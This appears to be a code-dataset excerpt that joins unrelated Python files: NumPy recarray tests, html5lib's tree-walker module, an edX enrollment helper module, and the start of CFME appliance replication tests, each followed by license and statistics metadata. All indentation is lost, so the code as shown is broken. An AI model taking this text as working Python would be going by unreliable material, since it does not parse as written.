assert_equal(r[1].item(), (25444, asbytes('efg'), 1633837924))
def test_method_array2(self):
r = np.rec.array([(1, 11, 'a'), (2, 22, 'b'), (3, 33, 'c'), (4, 44, 'd'), (5, 55, 'ex'),
(6, 66, 'f'), (7, 77, 'g')], formats='u1,f4,a1')
assert_equal(r[1].item(), (2, 22.0, asbytes('b')))
def test_recarray_slices(self):
r = np.rec.array([(1, 11, 'a'), (2, 22, 'b'), (3, 33, 'c'), (4, 44, 'd'), (5, 55, 'ex'),
(6, 66, 'f'), (7, 77, 'g')], formats='u1,f4,a1')
assert_equal(r[1::2][1].item(), (4, 44.0, asbytes('d')))
def test_recarray_fromarrays(self):
x1 = np.array([1, 2, 3, 4])
x2 = np.array(['a', 'dd', 'xyz', '12'])
x3 = np.array([1.1, 2, 3, 4])
r = np.rec.fromarrays([x1, x2, x3], names='a,b,c')
assert_equal(r[1].item(), (2, 'dd', 2.0))
x1[1] = 34
assert_equal(r.a, np.array([1, 2, 3, 4]))
def test_recarray_fromfile(self):
data_dir = path.join(path.dirname(__file__), 'data')
filename = path.join(data_dir, 'recarray_from_file.fits')
fd = open(filename, 'rb')
fd.seek(2880 * 2)
r1 = np.rec.fromfile(fd, formats='f8,i4,a5', shape=3, byteorder='big')
fd.seek(2880 * 2)
r2 = np.rec.array(fd, formats='f8,i4,a5', shape=3, byteorder='big')
fd.close()
assert_equal(r1, r2)
def test_recarray_from_obj(self):
count = 10
a = np.zeros(count, dtype='O')
b = np.zeros(count, dtype='f8')
c = np.zeros(count, dtype='f8')
for i in range(len(a)):
a[i] = list(range(1, 10))
mine = np.rec.fromarrays([a, b, c], names='date,data1,data2')
for i in range(len(a)):
assert_((mine.date[i] == list(range(1, 10))))
assert_((mine.data1[i] == 0.0))
assert_((mine.data2[i] == 0.0))
def test_recarray_from_repr(self):
a = np.array([(1,'ABC'), (2, "DEF")],
dtype=[('foo', int), ('bar', 'S4')])
recordarr = np.rec.array(a)
recarr = a.view(np.recarray)
recordview = a.view(np.dtype((np.record, a.dtype)))
recordarr_r = eval("numpy." + repr(recordarr), {'numpy': np})
recarr_r = eval("numpy." + repr(recarr), {'numpy': np})
recordview_r = eval("numpy." + repr(recordview), {'numpy': np})
assert_equal(type(recordarr_r), np.recarray)
assert_equal(recordarr_r.dtype.type, np.record)
assert_equal(recordarr, recordarr_r)
assert_equal(type(recarr_r), np.recarray)
assert_equal(recarr_r.dtype.type, np.record)
assert_equal(recarr, recarr_r)
assert_equal(type(recordview_r), np.ndarray)
assert_equal(recordview.dtype.type, np.record)
assert_equal(recordview, recordview_r)
def test_recarray_views(self):
a = np.array([(1,'ABC'), (2, "DEF")],
dtype=[('foo', int), ('bar', 'S4')])
b = np.array([1,2,3,4,5], dtype=np.int64)
#check that np.rec.array gives right dtypes
assert_equal(np.rec.array(a).dtype.type, np.record)
assert_equal(type(np.rec.array(a)), np.recarray)
assert_equal(np.rec.array(b).dtype.type, np.int64)
assert_equal(type(np.rec.array(b)), np.recarray)
#check that viewing as recarray does the same
assert_equal(a.view(np.recarray).dtype.type, np.record)
assert_equal(type(a.view(np.recarray)), np.recarray)
assert_equal(b.view(np.recarray).dtype.type, np.int64)
assert_equal(type(b.view(np.recarray)), np.recarray)
#check that view to non-structured dtype preserves type=np.recarray
r = np.rec.array(np.ones(4, dtype="f4,i4"))
rv = r.view('f8').view('f4,i4')
assert_equal(type(rv), np.recarray)
assert_equal(rv.dtype.type, np.record)
#check that we can undo the view
arrs = [np.ones(4, dtype='f4,i4'), np.ones(4, dtype='f8')]
for arr in arrs:
rec = np.rec.array(arr)
# recommended way to view as an ndarray:
arr2 = rec.view(rec.dtype.fields or rec.dtype, np.ndarray)
assert_equal(arr2.dtype.type, arr.dtype.type)
assert_equal(type(arr2), type(arr))
def test_recarray_repr(self):
# make sure non-structured dtypes also show up as rec.array
a = np.array(np.ones(4, dtype='f8'))
assert_(repr(np.rec.array(a)).startswith('rec.array'))
def test_recarray_from_names(self):
ra = np.rec.array([
(1, 'abc', 3.7000002861022949, 0),
(2, 'xy', 6.6999998092651367, 1),
(0, ' ', 0.40000000596046448, 0)],
names='c1, c2, c3, c4')
pa = np.rec.fromrecords([
(1, 'abc', 3.7000002861022949, 0),
(2, 'xy', 6.6999998092651367, 1),
(0, ' ', 0.40000000596046448, 0)],
names='c1, c2, c3, c4')
assert_(ra.dtype == pa.dtype)
assert_(ra.shape == pa.shape)
for k in range(len(ra)):
assert_(ra[k].item() == pa[k].item())
def test_recarray_conflict_fields(self):
ra = np.rec.array([(1, 'abc', 2.3), (2, 'xyz', 4.2),
(3, 'wrs', 1.3)],
names='field, shape, mean')
ra.mean = [1.1, 2.2, 3.3]
assert_array_almost_equal(ra['mean'], [1.1, 2.2, 3.3])
assert_(type(ra.mean) is type(ra.var))
ra.shape = (1, 3)
assert_(ra.shape == (1, 3))
ra.shape = ['A', 'B', 'C']
assert_array_equal(ra['shape'], [['A', 'B', 'C']])
ra.field = 5
assert_array_equal(ra['field'], [[5, 5, 5]])
assert_(isinstance(ra.field, collections.Callable))
def test_fromrecords_with_explicit_dtype(self):
a = np.rec.fromrecords([(1, 'a'), (2, 'bbb')],
dtype=[('a', int), ('b', np.object)])
assert_equal(a.a, [1, 2])
assert_equal(a[0].a, 1)
assert_equal(a.b, ['a', 'bbb'])
assert_equal(a[-1].b, 'bbb')
#
ndtype = np.dtype([('a', int), ('b', np.object)])
a = np.rec.fromrecords([(1, 'a'), (2, 'bbb')], dtype=ndtype)
assert_equal(a.a, [1, 2])
assert_equal(a[0].a, 1)
assert_equal(a.b, ['a', 'bbb'])
assert_equal(a[-1].b, 'bbb')
def test_recarray_stringtypes(self):
# Issue #3993
a = np.array([('abc ', 1), ('abc', 2)],
dtype=[('foo', 'S4'), ('bar', int)])
a = a.view(np.recarray)
assert_equal(a.foo[0] == a.foo[1], False)
def test_recarray_returntypes(self):
qux_fields = {'C': (np.dtype('S5'), 0), 'D': (np.dtype('S5'), 6)}
a = np.rec.array([('abc ', (1,1), 1, ('abcde', 'fgehi')),
('abc', (2,3), 1, ('abcde', 'jklmn'))],
dtype=[('foo', 'S4'),
('bar', [('A', int), ('B', int)]),
('baz', int), ('qux', qux_fields)])
assert_equal(type(a.foo), np.ndarray)
assert_equal(type(a['foo']), np.ndarray)
assert_equal(type(a.bar), np.recarray)
assert_equal(type(a['bar']), np.recarray)
assert_equal(a.bar.dtype.type, np.record)
assert_equal(type(a['qux']), np.recarray)
assert_equal(a.qux.dtype.type, np.record)
assert_equal(dict(a.qux.dtype.fields), qux_fields)
assert_equal(type(a.baz), np.ndarray)
assert_equal(type(a['baz']), np.ndarray)
assert_equal(type(a[0].bar), np.record)
assert_equal(type(a[0]['bar']), np.record)
assert_equal(a[0].bar.A, 1)
assert_equal(a[0].bar['A'], 1)
assert_equal(a[0]['bar'].A, 1)
assert_equal(a[0]['bar']['A'], 1)
assert_equal(a[0].qux.D, asbytes('fgehi'))
assert_equal(a[0].qux['D'], asbytes('fgehi'))
assert_equal(a[0]['qux'].D, asbytes('fgehi'))
assert_equal(a[0]['qux']['D'], asbytes('fgehi'))
class TestRecord(TestCase):
def setUp(self):
self.data = np.rec.fromrecords([(1, 2, 3), (4, 5, 6)],
dtype=[("col1", "<i4"),
("col2", "<i4"),
("col3", "<i4")])
def test_assignment1(self):
a = self.data
assert_equal(a.col1[0], 1)
a[0].col1 = 0
assert_equal(a.col1[0], 0)
def test_assignment2(self):
a = self.data
assert_equal(a.col1[0], 1)
a.col1[0] = 0
assert_equal(a.col1[0], 0)
def test_invalid_assignment(self):
a = self.data
def assign_invalid_column(x):
x[0].col5 = 1
self.assertRaises(AttributeError, assign_invalid_column, a)
def test_out_of_order_fields(self):
"""Ticket #1431."""
x = self.data[['col1', 'col2']]
y = self.data[['col2', 'col1']]
assert_equal(x[0][0], y[0][1])
def test_pickle_1(self):
# Issue #1529
a = np.array([(1, [])], dtype=[('a', np.int32), ('b', np.int32, 0)])
assert_equal(a, pickle.loads(pickle.dumps(a)))
assert_equal(a[0], pickle.loads(pickle.dumps(a[0])))
def test_pickle_2(self):
a = self.data
assert_equal(a, pickle.loads(pickle.dumps(a)))
assert_equal(a[0], pickle.loads(pickle.dumps(a[0])))
def test_objview_record(self):
# https://github.com/numpy/numpy/issues/2599
dt = np.dtype([('foo', 'i8'), ('bar', 'O')])
r = np.zeros((1,3), dtype=dt).view(np.recarray)
r.foo = np.array([1, 2, 3]) # TypeError?
# https://github.com/numpy/numpy/issues/3256
ra = np.recarray((2,), dtype=[('x', object), ('y', float), ('z', int)])
ra[['x','y']] # TypeError?
def test_record_scalar_setitem(self):
# https://github.com/numpy/numpy/issues/3561
rec = np.recarray(1, dtype=[('x', float, 5)])
rec[0].x = 1
assert_equal(rec[0].x, np.ones(5))
def test_missing_field(self):
# https://github.com/numpy/numpy/issues/4806
arr = np.zeros((3,), dtype=[('x', int), ('y', int)])
assert_raises(ValueError, lambda: arr[['nofield']])
def test_find_duplicate():
l1 = [1, 2, 3, 4, 5, 6]
assert_(np.rec.find_duplicate(l1) == [])
l2 = [1, 2, 1, 4, 5, 6]
assert_(np.rec.find_duplicate(l2) == [1])
l3 = [1, 2, 1, 4, 1, 6, 2, 3]
assert_(np.rec.find_duplicate(l3) == [1, 2])
l3 = [2, 2, 1, 4, 1, 6, 2, 3]
assert_(np.rec.find_duplicate(l3) == [2, 1])
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause | -9,075,986,738,709,981,000 | 38.023411 | 96 | 0.517569 | false |
blarghmatey/pip | pip/_vendor/html5lib/treewalkers/__init__.py | 499 | 5766 | """A collection of modules for iterating through different kinds of
tree, generating tokens identical to those produced by the tokenizer
module.
To create a tree walker for a new type of tree, you need to do
implement a tree walker object (called TreeWalker by convention) that
implements a 'serialize' method taking a tree as sole argument and
returning an iterator generating tokens.
"""
from __future__ import absolute_import, division, unicode_literals
__all__ = ["getTreeWalker", "pprint", "dom", "etree", "genshistream", "lxmletree",
"pulldom"]
import sys
from .. import constants
from ..utils import default_etree
treeWalkerCache = {}
def getTreeWalker(treeType, implementation=None, **kwargs):
"""Get a TreeWalker class for various types of tree with built-in support
treeType - the name of the tree type required (case-insensitive). Supported
values are:
"dom" - The xml.dom.minidom DOM implementation
"pulldom" - The xml.dom.pulldom event stream
"etree" - A generic walker for tree implementations exposing an
elementtree-like interface (known to work with
ElementTree, cElementTree and lxml.etree).
"lxml" - Optimized walker for lxml.etree
"genshi" - a Genshi stream
implementation - (Currently applies to the "etree" tree type only). A module
implementing the tree type e.g. xml.etree.ElementTree or
cElementTree."""
treeType = treeType.lower()
if treeType not in treeWalkerCache:
if treeType in ("dom", "pulldom"):
name = "%s.%s" % (__name__, treeType)
__import__(name)
mod = sys.modules[name]
treeWalkerCache[treeType] = mod.TreeWalker
elif treeType == "genshi":
from . import genshistream
treeWalkerCache[treeType] = genshistream.TreeWalker
elif treeType == "lxml":
from . import lxmletree
treeWalkerCache[treeType] = lxmletree.TreeWalker
elif treeType == "etree":
from . import etree
if implementation is None:
implementation = default_etree
# XXX: NEVER cache here, caching is done in the etree submodule
return etree.getETreeModule(implementation, **kwargs).TreeWalker
return treeWalkerCache.get(treeType)
def concatenateCharacterTokens(tokens):
pendingCharacters = []
for token in tokens:
type = token["type"]
if type in ("Characters", "SpaceCharacters"):
pendingCharacters.append(token["data"])
else:
if pendingCharacters:
yield {"type": "Characters", "data": "".join(pendingCharacters)}
pendingCharacters = []
yield token
if pendingCharacters:
yield {"type": "Characters", "data": "".join(pendingCharacters)}
def pprint(walker):
"""Pretty printer for tree walkers"""
output = []
indent = 0
for token in concatenateCharacterTokens(walker):
type = token["type"]
if type in ("StartTag", "EmptyTag"):
# tag name
if token["namespace"] and token["namespace"] != constants.namespaces["html"]:
if token["namespace"] in constants.prefixes:
ns = constants.prefixes[token["namespace"]]
else:
ns = token["namespace"]
name = "%s %s" % (ns, token["name"])
else:
name = token["name"]
output.append("%s<%s>" % (" " * indent, name))
indent += 2
# attributes (sorted for consistent ordering)
attrs = token["data"]
for (namespace, localname), value in sorted(attrs.items()):
if namespace:
if namespace in constants.prefixes:
ns = constants.prefixes[namespace]
else:
ns = namespace
name = "%s %s" % (ns, localname)
else:
name = localname
output.append("%s%s=\"%s\"" % (" " * indent, name, value))
# self-closing
if type == "EmptyTag":
indent -= 2
elif type == "EndTag":
indent -= 2
elif type == "Comment":
output.append("%s<!-- %s -->" % (" " * indent, token["data"]))
elif type == "Doctype":
if token["name"]:
if token["publicId"]:
output.append("""%s<!DOCTYPE %s "%s" "%s">""" %
(" " * indent,
token["name"],
token["publicId"],
token["systemId"] if token["systemId"] else ""))
elif token["systemId"]:
output.append("""%s<!DOCTYPE %s "" "%s">""" %
(" " * indent,
token["name"],
token["systemId"]))
else:
output.append("%s<!DOCTYPE %s>" % (" " * indent,
token["name"]))
else:
output.append("%s<!DOCTYPE >" % (" " * indent,))
elif type == "Characters":
output.append("%s\"%s\"" % (" " * indent, token["data"]))
elif type == "SpaceCharacters":
assert False, "concatenateCharacterTokens should have got rid of all Space tokens"
else:
raise ValueError("Unknown token type, %s" % type)
return "\n".join(output)
| mit | -6,778,752,260,165,360,000 | 38.22449 | 94 | 0.522546 | false |
olexiim/edx-platform | lms/djangoapps/instructor/enrollment.py | 2 | 13610 | """
Enrollment operations for use by instructor APIs.
Does not include any access control, be sure to check access before calling.
"""
import json
from django.contrib.auth.models import User
from django.conf import settings
from django.core.urlresolvers import reverse
from django.core.mail import send_mail
from student.models import CourseEnrollment, CourseEnrollmentAllowed
from courseware.models import StudentModule
from edxmako.shortcuts import render_to_string
from submissions import api as sub_api # installed from the edx-submissions repository
from student.models import anonymous_id_for_user
from microsite_configuration import microsite
class EmailEnrollmentState(object):
""" Store the complete enrollment state of an email in a class """
def __init__(self, course_id, email):
exists_user = User.objects.filter(email=email).exists()
if exists_user:
user = User.objects.get(email=email)
mode, is_active = CourseEnrollment.enrollment_mode_for_user(user, course_id)
# is_active is `None` if the user is not enrolled in the course
exists_ce = is_active is not None and is_active
full_name = user.profile.name
else:
mode = None
exists_ce = False
full_name = None
ceas = CourseEnrollmentAllowed.objects.filter(course_id=course_id, email=email).all()
exists_allowed = ceas.exists()
state_auto_enroll = exists_allowed and ceas[0].auto_enroll
self.user = exists_user
self.enrollment = exists_ce
self.allowed = exists_allowed
self.auto_enroll = bool(state_auto_enroll)
self.full_name = full_name
self.mode = mode
def __repr__(self):
return "{}(user={}, enrollment={}, allowed={}, auto_enroll={})".format(
self.__class__.__name__,
self.user,
self.enrollment,
self.allowed,
self.auto_enroll,
)
def to_dict(self):
"""
example: {
'user': False,
'enrollment': False,
'allowed': True,
'auto_enroll': True,
}
"""
return {
'user': self.user,
'enrollment': self.enrollment,
'allowed': self.allowed,
'auto_enroll': self.auto_enroll,
}
def enroll_email(course_id, student_email, auto_enroll=False, email_students=False, email_params=None):
"""
Enroll a student by email.
`student_email` is student's emails e.g. "[email protected]"
`auto_enroll` determines what is put in CourseEnrollmentAllowed.auto_enroll
if auto_enroll is set, then when the email registers, they will be
enrolled in the course automatically.
`email_students` determines if student should be notified of action by email.
`email_params` parameters used while parsing email templates (a `dict`).
returns two EmailEnrollmentState's
representing state before and after the action.
"""
previous_state = EmailEnrollmentState(course_id, student_email)
if previous_state.user:
# if the student is currently unenrolled, don't enroll them in their
# previous mode
course_mode = u"honor"
if previous_state.enrollment:
course_mode = previous_state.mode
CourseEnrollment.enroll_by_email(student_email, course_id, course_mode)
if email_students:
email_params['message'] = 'enrolled_enroll'
email_params['email_address'] = student_email
email_params['full_name'] = previous_state.full_name
send_mail_to_student(student_email, email_params)
else:
cea, _ = CourseEnrollmentAllowed.objects.get_or_create(course_id=course_id, email=student_email)
cea.auto_enroll = auto_enroll
cea.save()
if email_students:
email_params['message'] = 'allowed_enroll'
email_params['email_address'] = student_email
send_mail_to_student(student_email, email_params)
after_state = EmailEnrollmentState(course_id, student_email)
return previous_state, after_state
def unenroll_email(course_id, student_email, email_students=False, email_params=None):
"""
Unenroll a student by email.
`student_email` is student's emails e.g. "[email protected]"
`email_students` determines if student should be notified of action by email.
`email_params` parameters used while parsing email templates (a `dict`).
returns two EmailEnrollmentState's
representing state before and after the action.
"""
previous_state = EmailEnrollmentState(course_id, student_email)
if previous_state.enrollment:
CourseEnrollment.unenroll_by_email(student_email, course_id)
if email_students:
email_params['message'] = 'enrolled_unenroll'
email_params['email_address'] = student_email
email_params['full_name'] = previous_state.full_name
send_mail_to_student(student_email, email_params)
if previous_state.allowed:
CourseEnrollmentAllowed.objects.get(course_id=course_id, email=student_email).delete()
if email_students:
email_params['message'] = 'allowed_unenroll'
email_params['email_address'] = student_email
# Since no User object exists for this student there is no "full_name" available.
send_mail_to_student(student_email, email_params)
after_state = EmailEnrollmentState(course_id, student_email)
return previous_state, after_state
def send_beta_role_email(action, user, email_params):
"""
Send an email to a user added or removed as a beta tester.
`action` is one of 'add' or 'remove'
`user` is the User affected
`email_params` parameters used while parsing email templates (a `dict`).
"""
if action == 'add':
email_params['message'] = 'add_beta_tester'
email_params['email_address'] = user.email
email_params['full_name'] = user.profile.name
elif action == 'remove':
email_params['message'] = 'remove_beta_tester'
email_params['email_address'] = user.email
email_params['full_name'] = user.profile.name
else:
raise ValueError("Unexpected action received '{}' - expected 'add' or 'remove'".format(action))
send_mail_to_student(user.email, email_params)
def reset_student_attempts(course_id, student, module_state_key, delete_module=False):
"""
Reset student attempts for a problem. Optionally deletes all student state for the specified problem.
In the previous instructor dashboard it was possible to modify/delete
modules that were not problems. That has been disabled for safety.
`student` is a User
`problem_to_reset` is the name of a problem e.g. 'L2Node1'.
To build the module_state_key 'problem/' and course information will be appended to `problem_to_reset`.
Raises:
ValueError: `problem_state` is invalid JSON.
StudentModule.DoesNotExist: could not load the student module.
submissions.SubmissionError: unexpected error occurred while resetting the score in the submissions API.
"""
# Reset the student's score in the submissions API
# Currently this is used only by open assessment (ORA 2)
# We need to do this *before* retrieving the `StudentModule` model,
# because it's possible for a score to exist even if no student module exists.
if delete_module:
sub_api.reset_score(
anonymous_id_for_user(student, course_id),
course_id.to_deprecated_string(),
module_state_key.to_deprecated_string(),
)
module_to_reset = StudentModule.objects.get(
student_id=student.id,
course_id=course_id,
module_state_key=module_state_key
)
if delete_module:
module_to_reset.delete()
else:
_reset_module_attempts(module_to_reset)
def _reset_module_attempts(studentmodule):
"""
Reset the number of attempts on a studentmodule.
Throws ValueError if `problem_state` is invalid JSON.
"""
# load the state json
problem_state = json.loads(studentmodule.state)
# old_number_of_attempts = problem_state["attempts"]
problem_state["attempts"] = 0
# save
studentmodule.state = json.dumps(problem_state)
studentmodule.save()
def get_email_params(course, auto_enroll, secure=True):
"""
Generate parameters used when parsing email templates.
`auto_enroll` is a flag for auto enrolling non-registered students: (a `boolean`)
Returns a dict of parameters
"""
protocol = 'https' if secure else 'http'
stripped_site_name = microsite.get_value(
'SITE_NAME',
settings.SITE_NAME
)
# TODO: Use request.build_absolute_uri rather than '{proto}://{site}{path}'.format
# and check with the Services team that this works well with microsites
registration_url = u'{proto}://{site}{path}'.format(
proto=protocol,
site=stripped_site_name,
path=reverse('student.views.register_user')
)
course_url = u'{proto}://{site}{path}'.format(
proto=protocol,
site=stripped_site_name,
path=reverse('course_root', kwargs={'course_id': course.id.to_deprecated_string()})
)
# We can't get the url to the course's About page if the marketing site is enabled.
course_about_url = None
if not settings.FEATURES.get('ENABLE_MKTG_SITE', False):
course_about_url = u'{proto}://{site}{path}'.format(
proto=protocol,
site=stripped_site_name,
path=reverse('about_course', kwargs={'course_id': course.id.to_deprecated_string()})
)
is_shib_course = uses_shib(course)
# Composition of email
email_params = {
'site_name': stripped_site_name,
'registration_url': registration_url,
'course': course,
'auto_enroll': auto_enroll,
'course_url': course_url,
'course_about_url': course_about_url,
'is_shib_course': is_shib_course,
}
return email_params
def send_mail_to_student(student, param_dict):
"""
Construct the email using templates and then send it.
`student` is the student's email address (a `str`),
`param_dict` is a `dict` with keys
[
`site_name`: name given to edX instance (a `str`)
`registration_url`: url for registration (a `str`)
`course_id`: id of course (a `str`)
`auto_enroll`: user input option (a `str`)
`course_url`: url of course (a `str`)
`email_address`: email of student (a `str`)
`full_name`: student full name (a `str`)
`message`: type of email to send and template to use (a `str`)
`is_shib_course`: (a `boolean`)
]
Returns a boolean indicating whether the email was sent successfully.
"""
# add some helpers and microconfig subsitutions
if 'course' in param_dict:
param_dict['course_name'] = param_dict['course'].display_name_with_default
param_dict['site_name'] = microsite.get_value(
'SITE_NAME',
param_dict['site_name']
)
subject = None
message = None
# see if we are running in a microsite and that there is an
# activation email template definition available as configuration, if so, then render that
message_type = param_dict['message']
email_template_dict = {
'allowed_enroll': (
'emails/enroll_email_allowedsubject.txt',
'emails/enroll_email_allowedmessage.txt'
),
'enrolled_enroll': (
'emails/enroll_email_enrolledsubject.txt',
'emails/enroll_email_enrolledmessage.txt'
),
'allowed_unenroll': (
'emails/unenroll_email_subject.txt',
'emails/unenroll_email_allowedmessage.txt'
),
'enrolled_unenroll': (
'emails/unenroll_email_subject.txt',
'emails/unenroll_email_enrolledmessage.txt'
),
'add_beta_tester': (
'emails/add_beta_tester_email_subject.txt',
'emails/add_beta_tester_email_message.txt'
),
'remove_beta_tester': (
'emails/remove_beta_tester_email_subject.txt',
'emails/remove_beta_tester_email_message.txt'
),
'account_creation_and_enrollment': (
'emails/enroll_email_enrolledsubject.txt',
'emails/account_creation_and_enroll_emailMessage.txt'
),
}
subject_template, message_template = email_template_dict.get(message_type, (None, None))
if subject_template is not None and message_template is not None:
subject = render_to_string(subject_template, param_dict)
message = render_to_string(message_template, param_dict)
if subject and message:
# Remove leading and trailing whitespace from body
message = message.strip()
# Email subject *must not* contain newlines
subject = ''.join(subject.splitlines())
from_address = microsite.get_value(
'email_from_address',
settings.DEFAULT_FROM_EMAIL
)
send_mail(subject, message, from_address, [student], fail_silently=False)
def uses_shib(course):
"""
Used to return whether course has Shibboleth as the enrollment domain
Returns a boolean indicating if Shibboleth authentication is set for this course.
"""
return course.enrollment_domain and course.enrollment_domain.startswith(settings.SHIBBOLETH_DOMAIN_PREFIX)
| agpl-3.0 | -9,127,313,620,599,277,000 | 35.293333 | 112 | 0.645187 | false |
akarol/cfme_tests | cfme/tests/distributed/test_appliance_replication.py | 1 | 12939 | # -*- coding: utf-8 -*-
import pytest
from time import sleep
from six.moves.urllib.parse import urlparse
from cfme.base.ui import ServerView
from cfme.common.vm import VM
from cfme.infrastructure.provider import wait_for_a_provider
from cfme.utils.appliance import provision_appliance
from cfme.utils.appliance.implementations.ui import navigate_to
from cfme.utils.conf import credentials
from cfme.utils.generators import random_vm_name
from cfme.utils.log import logger
from cfme.utils.ssh import SSHClient
from cfme.utils.wait import wait_for
from cfme import test_requirements
pytestmark = [
pytest.mark.long_running,
test_requirements.distributed,
pytest.mark.uncollect(reason="test framework broke browser_steal"),
]
def get_ssh_client(hostname):
""" Returns fresh ssh client connected to given server using given credentials
"""
hostname = urlparse('scheme://' + hostname).netloc
connect_kwargs = {
'username': credentials['ssh']['username'],
'password': credentials['ssh']['password'],
'hostname': hostname,
}
return SSHClient(**connect_kwargs)
def get_replication_appliances(appliance):
"""Returns two database-owning appliances configured
with unique region numbers.
"""
ver_to_prov = str(appliance.version)
appl1 = provision_appliance(ver_to_prov, 'long-test_repl_A')
appl2 = provision_appliance(ver_to_prov, 'long-test_repl_B')
appl1.configure(region=1)
appl1.ipapp.wait_for_web_ui()
appl2.update_guid()
appl2.configure(region=2, key_address=appl1.hostname)
appl2.ipapp.wait_for_web_ui()
return appl1, appl2
def get_distributed_appliances(appliance):
"""Returns one database-owning appliance, and a second appliance
that connects to the database of the first.
"""
ver_to_prov = str(appliance.version)
appl1 = provision_appliance(ver_to_prov, 'long-test_childDB_A')
appl2 = provision_appliance(ver_to_prov, 'long-test_childDB_B')
appl1.configure(region=1)
appl1.ipapp.wait_for_web_ui()
appl2.configure(region=1, key_address=appl1.hostname, db_address=appl1.hostname)
appl2.ipapp.wait_for_web_ui()
return appl1, appl2
def configure_db_replication(db_address, appliance):
"""Enables the sync role and configures the appliance to replicate to
the db_address specified. Then, it waits for the UI to show the replication
as active and the backlog as empty.
"""
replication_conf = appliance.server.zone.region.replication
replication_conf.set_replication(
{'host': db_address}, 'global')
view = appliance.server.browser.create_view(ServerView)
view.flash.assert_message("Configuration settings saved for CFME Server") # may be partial
appliance.server.settings.enable_server_roles('database_synchronization')
rep_status, _ = wait_for(replication_conf.get_replication_status, fail_condition=False,
num_sec=360, delay=10,
fail_func=appliance.server.browser.refresh,
message="get_replication_status")
assert rep_status
wait_for(lambda: replication_conf.get_global_replication_backlog == 0, fail_condition=False,
num_sec=120, delay=10,
fail_func=appliance.server.browser.refresh, message="get_replication_backlog")
@pytest.yield_fixture(scope="module")
def test_vm(virtualcenter_provider):
"""Fixture to provision appliance to the provider being tested if necessary"""
vm_name = random_vm_name('distpwr')
vm = VM.factory(vm_name, virtualcenter_provider)
if not virtualcenter_provider.mgmt.does_vm_exist(vm_name):
logger.info("deploying %r on provider %r", vm_name, virtualcenter_provider.key)
vm.create_on_provider(find_in_cfme=True, allow_skip="default")
else:
logger.info("recycling deployed vm %r on provider %r", vm_name, virtualcenter_provider.key)
yield vm
try:
virtualcenter_provider.mgmt.delete_vm(vm_name=vm_name)
except Exception:
logger.exception('Failed deleting VM "%r" on "%r"', vm_name, virtualcenter_provider.name)
@pytest.mark.tier(2)
@pytest.mark.ignore_stream("upstream")
def test_appliance_replicate_between_regions(request, virtualcenter_provider):
"""Tests that a provider added to an appliance in one region
is replicated to the parent appliance in another region.
Metadata:
test_flag: replication
"""
appl1, appl2 = get_replication_appliances()
def finalize():
appl1.destroy()
appl2.destroy()
request.addfinalizer(finalize)
appl1.ipapp.browser_steal = True
with appl1.ipapp:
configure_db_replication(appl2.hostname)
virtualcenter_provider.create()
wait_for_a_provider()
appl2.ipapp.browser_steal = True
with appl2.ipapp:
wait_for_a_provider()
assert virtualcenter_provider.exists
@pytest.mark.tier(2)
@pytest.mark.ignore_stream("upstream")
def test_external_database_appliance(request, virtualcenter_provider, appliance):
"""Tests that one appliance can externally
connect to the database of another appliance.
Metadata:
test_flag: replication
"""
appl1, appl2 = get_distributed_appliances(appliance)
def finalize():
appl1.destroy()
appl2.destroy()
request.addfinalizer(finalize)
appl1.ipapp.browser_steal = True
with appl1.ipapp:
virtualcenter_provider.create()
wait_for_a_provider()
appl2.ipapp.browser_steal = True
with appl2.ipapp:
wait_for_a_provider()
assert virtualcenter_provider.exists
@pytest.mark.tier(2)
@pytest.mark.ignore_stream("upstream")
def test_appliance_replicate_sync_role_change(request, virtualcenter_provider, appliance):
"""Tests that a role change is replicated
Metadata:
test_flag: replication
"""
appl1, appl2 = get_replication_appliances()
replication_conf = appliance.server.zone.region.replication
def finalize():
appl1.destroy()
appl2.destroy()
request.addfinalizer(finalize)
appl1.ipapp.browser_steal = True
with appl1.ipapp:
server_settings = appliance.server.settings
configure_db_replication(appl2.hostname)
# Replication is up and running, now disable DB sync role
server_settings.disable_server_roles('database_synchronization')
wait_for(replication_conf.get_replication_status, fail_condition=True, num_sec=360,
delay=10, fail_func=appl1.server.browser.refresh, message="get_replication_status")
server_settings.enable_server_roles('database_synchronization')
wait_for(replication_conf.get_replication_status, fail_condition=False, num_sec=360,
delay=10, fail_func=appl1.server.browser.refresh, message="get_replication_status")
assert replication_conf.get_replication_status()
virtualcenter_provider.create()
wait_for_a_provider()
appl2.ipapp.browser_steal = True
with appl2.ipapp:
wait_for_a_provider()
assert virtualcenter_provider.exists
@pytest.mark.tier(2)
@pytest.mark.ignore_stream("upstream", "5.7") # no config->diagnostics->replication tab in 5.7
def test_appliance_replicate_sync_role_change_with_backlog(request, virtualcenter_provider,
appliance):
"""Tests that a role change is replicated with backlog
Metadata:
test_flag: replication
"""
appl1, appl2 = get_replication_appliances()
replication_conf = appliance.server.zone.region.replication
def finalize():
appl1.destroy()
appl2.destroy()
request.addfinalizer(finalize)
appl1.ipapp.browser_steal = True
with appl1.ipapp:
server_settings = appliance.server.settings
configure_db_replication(appl2.hostname)
# Replication is up and running, now disable DB sync role
virtualcenter_provider.create()
server_settings.disable_server_roles('database_synchronization')
wait_for(replication_conf.get_replication_status, fail_condition=True, num_sec=360,
delay=10, fail_func=appl1.server.browser.refresh, message="get_replication_status")
server_settings.enable_server_roles('database_synchronization')
wait_for(replication_conf.get_replication_status, fail_condition=False, num_sec=360,
delay=10, fail_func=appl1.server.browser.refresh, message="get_replication_status")
assert replication_conf.get_replication_status()
wait_for_a_provider()
appl2.ipapp.browser_steal = True
with appl2.ipapp:
wait_for_a_provider()
assert virtualcenter_provider.exists
@pytest.mark.tier(2)
@pytest.mark.ignore_stream("upstream", "5.7") # no config->diagnostics->replication tab in 5.7
def test_appliance_replicate_database_disconnection(request, virtualcenter_provider, appliance):
"""Tests a database disconnection
Metadata:
test_flag: replication
"""
appl1, appl2 = get_replication_appliances()
replication_conf = appliance.server.zone.region.replication
def finalize():
appl1.destroy()
appl2.destroy()
request.addfinalizer(finalize)
appl1.ipapp.browser_steal = True
with appl1.ipapp:
configure_db_replication(appl2.hostname)
# Replication is up and running, now stop the DB on the replication parent
appl2.db.stop_db_service()
sleep(60)
appl2.db.start_db_service()
wait_for(replication_conf.get_replication_status, fail_condition=False, num_sec=360,
delay=10, fail_func=appl1.server.browser.refresh, message="get_replication_status")
assert replication_conf.get_replication_status()
virtualcenter_provider.create()
wait_for_a_provider()
appl2.ipapp.browser_steal = True
with appl2.ipapp:
wait_for_a_provider()
assert virtualcenter_provider.exists
@pytest.mark.tier(2)
